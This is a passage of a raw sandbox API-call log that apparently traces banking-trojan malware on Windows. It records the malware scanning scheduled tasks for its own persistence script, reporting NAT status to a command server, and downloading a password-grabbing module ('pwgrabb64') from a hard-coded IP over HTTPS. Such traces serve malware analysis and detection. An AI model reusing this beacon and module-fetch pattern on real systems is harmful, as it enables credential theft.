\\Microsoft\\Windows\\Work Folders\\Work Folders Maintenance Work\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n P1D\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n {63260BCE-A3FB-4A34-AA51-D4D8E877B62B}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.022] IUnknown:Release (This=0x929710) returned 0x0 [0164.022] IUnknown:Release (This=0x929590) returned 0x0 [0164.022] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0164.023] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.023] IUnknown:Release (This=0x929590) returned 0x0 [0164.023] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.023] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x53, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0164.023] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0164.024] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0164.024] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0164.024] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Automatic-Device-Join") returned 0x0 [0164.024] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;NS)(A;;GA;;;SY)(A;ID;FA;;;BA)(A;ID;GRGX;;;AU)\r\n $(@%SystemRoot%\\system32\\dsregcmd.exe,-101)\r\n \\Microsoft\\Windows\\Workplace Join\\Automatic-Device-Join\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT1M\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\dsregcmd.exe\r\n \r\n \r\n") returned 0x0 [0164.025] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;NS)(A;;GA;;;SY)(A;ID;FA;;;BA)(A;ID;GRGX;;;AU)\r\n $(@%SystemRoot%\\system32\\dsregcmd.exe,-101)\r\n \\Microsoft\\Windows\\Workplace Join\\Automatic-Device-Join\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT1M\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\dsregcmd.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.025] IUnknown:Release (This=0x929720) returned 0x0 [0164.025] IUnknown:Release (This=0x929590) returned 0x0 [0164.025] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0164.025] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.026] IUnknown:Release (This=0x929590) returned 0x0 [0164.026] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.026] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x54, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0164.026] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0164.031] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0164.031] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0164.031] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="License Validation") returned 0x0 [0164.031] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-10-27T17:18:44.0816608\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)(A;;FA;;;S-1-5-80-1227353651-1023108616-160957920-2792958081-1972711695)(A;;FR;;;S-1-5-87-1452649159-2109950929-2856838567-3638795029-1283063528)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-122)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-120)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-123)\r\n \\Microsoft\\Windows\\WS\\License Validation\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 255\r\n P31D\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n 2004-01-02T06:00:00\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n \r\n rundll32.exe\r\n WSClient.dll,WSpTLR licensing\r\n \r\n \r\n") returned 0x0 [0164.033] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-10-27T17:18:44.0816608\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)(A;;FA;;;S-1-5-80-1227353651-1023108616-160957920-2792958081-1972711695)(A;;FR;;;S-1-5-87-1452649159-2109950929-2856838567-3638795029-1283063528)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-122)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-120)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-123)\r\n \\Microsoft\\Windows\\WS\\License Validation\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 255\r\n P31D\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n 2004-01-02T06:00:00\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n \r\n rundll32.exe\r\n WSClient.dll,WSpTLR licensing\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.033] IUnknown:Release (This=0x9296f0) returned 0x0 [0164.033] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0164.033] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="WSTask") returned 0x0 [0164.033] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-10-27T17:18:44.0816608\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-80-1227353651-1023108616-160957920-2792958081-1972711695)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-122)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-120)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-121)\r\n \\Microsoft\\Windows\\WS\\WSTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {E52C9A25-F3E8-49E4-BAA7-FAD0EF620129}\r\n \r\n \r\n \r\n") returned 0x0 [0164.036] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-10-27T17:18:44.0816608\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-80-1227353651-1023108616-160957920-2792958081-1972711695)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-122)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-120)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-121)\r\n \\Microsoft\\Windows\\WS\\WSTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {E52C9A25-F3E8-49E4-BAA7-FAD0EF620129}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0164.036] IUnknown:Release (This=0x9296f0) returned 0x0 [0164.036] IUnknown:Release (This=0x929580) returned 0x0 [0164.036] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0164.039] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0164.039] IUnknown:Release (This=0x929580) returned 0x0 [0164.039] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0164.039] IUnknown:Release (This=0x929340) returned 0x0 [0164.039] TaskScheduler:IUnknown:Release (This=0x929290) returned 0x0 [0164.039] IUnknown:Release (This=0x929120) returned 0x0 [0164.039] TaskScheduler:IUnknown:Release (This=0x929080) returned 0x0 [0164.039] IUnknown:Release (This=0x928fa0) returned 0x0 [0164.040] IUnknown:Release (This=0x928e80) returned 0x0 [0164.040] TaskScheduler:IUnknown:Release (This=0x9276b0) returned 0x0 [0164.040] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e69ec0 | out: hHeap=0x2150000) returned 1 [0164.045] GetTickCount () returned 0xebc075 [0164.045] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xceb28 | out: lpWSAData=0xceb28) returned 0 [0164.045] gethostname (in: name=0xcea20, namelen=255 | out: name="xc64ZB") returned 0 [0164.063] getaddrinfo (in: pNodeName="xc64ZB", pServiceName=0x0, pHints=0x0, ppResult=0xcea18 | out: ppResult=0xcea18*=0x333411c0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x337bacd0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="fe80:0000:0000:0000:858a:31fa:02d3:471b", sin6_scope_id=0x5), ai_next=0x33341fc0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x337baa90*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="fe80:0000:0000:0000:2cf9:4710:a766:3856", sin6_scope_id=0x4), ai_next=0x33341340*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3334ca80*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.197"), ai_next=0x33341380*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x337bb450*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="2001:0000:2851:782c:2cf9:4710:a766:3856", sin6_scope_id=0x0), ai_next=0x0))))) returned 0 [0164.068] FreeAddrInfoW (pAddrInfo=0x333411c0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x337bacd0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="fe80:0000:0000:0000:858a:31fa:02d3:471b", sin6_scope_id=0x5), ai_next=0x33341fc0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x337baa90*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="fe80:0000:0000:0000:2cf9:4710:a766:3856", sin6_scope_id=0x4), ai_next=0x33341340*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3334ca80*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.197"), ai_next=0x33341380*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x337bb450*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="2001:0000:2851:782c:2cf9:4710:a766:3856", sin6_scope_id=0x0), ai_next=0x0))))) [0164.068] WSACleanup () returned 0 [0164.068] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0164.068] GetTickCount () returned 0xebc085 [0164.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e407b0 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] GetTickCount () returned 0xebc085 [0164.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e5fa80 [0164.069] UrlEscapeW (in: pszUrl="NAT status", pszEscaped=0x32e5fa80, pcchEscaped=0xce25c, dwFlags=0x0 | out: pszEscaped="NAT%20status", pcchEscaped=0xce25c) returned 0x0 [0164.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e5fe90 [0164.069] UrlEscapeW (in: pszUrl="client is behind NAT", pszEscaped=0x32e5fe90, pcchEscaped=0xce25c, dwFlags=0x0 | out: pszEscaped="client%20is%20behind%20NAT", pcchEscaped=0xce25c) returned 0x0 [0164.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x2000) returned 0x32e69ec0 [0164.070] WinHttpCloseHandle (hInternet=0x7581f0) returned 1 [0164.070] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/14/NAT%20status/client%20is%20behind%20NAT/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7b42c0 [0164.070] WinHttpSetOption (hInternet=0x7b42c0, dwOption=0x1f, lpBuffer=0xce288, dwBufferLength=0x4) returned 1 [0164.070] WinHttpSendRequest (hRequest=0x7b42c0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0170.482] WinHttpReceiveResponse (hRequest=0x7b42c0, lpReserved=0x0) returned 1 [0170.483] WinHttpQueryHeaders (in: hRequest=0x7b42c0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce284, lpdwBufferLength=0xce28c, lpdwIndex=0x0 | out: lpBuffer=0xce284*, lpdwBufferLength=0xce28c*=0x4, lpdwIndex=0x0) returned 1 [0170.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e69ec0 | out: hHeap=0x2150000) returned 1 [0170.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fa80 | out: hHeap=0x2150000) returned 1 [0170.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fe90 | out: hHeap=0x2150000) returned 1 [0170.489] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e69100 [0170.490] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66be0 [0170.491] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0170.492] GetTickCount () returned 0xebd99a [0170.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e407b0 [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] GetTickCount () returned 0xebd99a [0170.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e407f0 [0170.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e00 [0170.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x70) returned 0x32e41410 [0170.494] GetTickCount () returned 0xebd99a [0170.494] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41490 [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] GetTickCount () returned 0xebd99a [0170.494] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41900 [0170.494] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66f70 [0170.495] StrStrIW (lpFirst="pwgrabb sTart", lpSrch=" ") returned=" sTart" [0170.495] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a000 [0170.495] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49fa0 [0170.495] StrStrIW (lpFirst="sTart", lpSrch=" ") returned 0x0 [0170.496] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a000, Size=0x10) returned 0x32e49ee0 [0170.496] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f80 [0170.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0170.496] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ea0 [0170.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x32e49ea0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sTart", lpUsedDefaultChar=0x0) returned 6 [0170.496] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67390 [0170.496] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e67390 | out: hHeap=0x2150000) returned 1 [0170.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e671e0 [0170.497] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e671e0 | out: hHeap=0x2150000) returned 1 [0170.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67600 [0170.497] WinHttpConnect (hSession=0x71b780, pswzServerName="186.235.48.8", nServerPort=0x1bb, dwReserved=0x0) returned 0x332be210 [0170.498] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66c70 [0170.498] GetTickCount () returned 0xebd99a [0170.498] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e41940 [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] GetTickCount () returned 0xebd99a [0170.498] WinHttpOpenRequest (hConnect=0x332be210, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/5/pwgrabb64/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x332c97f0 [0170.499] WinHttpSetOption (hInternet=0x332c97f0, dwOption=0x1f, lpBuffer=0xcd638, dwBufferLength=0x4) returned 1 [0170.499] WinHttpSendRequest (hRequest=0x332c97f0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0172.049] WinHttpReceiveResponse (hRequest=0x332c97f0, lpReserved=0x0) returned 1 [0172.049] WinHttpQueryHeaders (in: hRequest=0x332c97f0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xcd634, lpdwBufferLength=0xcd63c, lpdwIndex=0x0 | out: lpBuffer=0xcd634*, lpdwBufferLength=0xcd63c*=0x4, lpdwIndex=0x0) returned 1 [0172.049] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0xece) returned 1 [0172.049] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xed0) returned 0x32e5fa80 [0172.050] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e5fa80, dwNumberOfBytesToRead=0xece, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e5fa80*, lpdwNumberOfBytesRead=0xcd714*=0xece) returned 1 [0172.050] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.050] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e5fa80, Size=0x2ed0) returned 0x32e69ec0 [0172.050] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e6ad8e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e6ad8e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.050] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x1030) returned 1 [0172.051] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e69ec0, Size=0x3f00) returned 0x32e69ec0 [0172.051] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e6cd8e, dwNumberOfBytesToRead=0x1030, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e6cd8e*, lpdwNumberOfBytesRead=0xcd714*=0x1030) returned 1 [0172.051] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.051] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e69ec0, Size=0x5f00) returned 0x32e69ec0 [0172.051] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e6ddbe, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e6ddbe*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.051] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.051] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e69ec0, Size=0x7f00) returned 0x32e69ec0 [0172.051] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e6fdbe, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e6fdbe*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.052] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.345] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e69ec0, Size=0x9f00) returned 0x32e766c0 [0172.347] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e7e5be, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e7e5be*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.347] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.347] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e766c0, Size=0xbf00) returned 0x32e766c0 [0172.348] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e805be, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e805be*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.348] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.348] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e766c0, Size=0xdf00) returned 0x32e766c0 [0172.348] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e825be, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e825be*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.349] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, 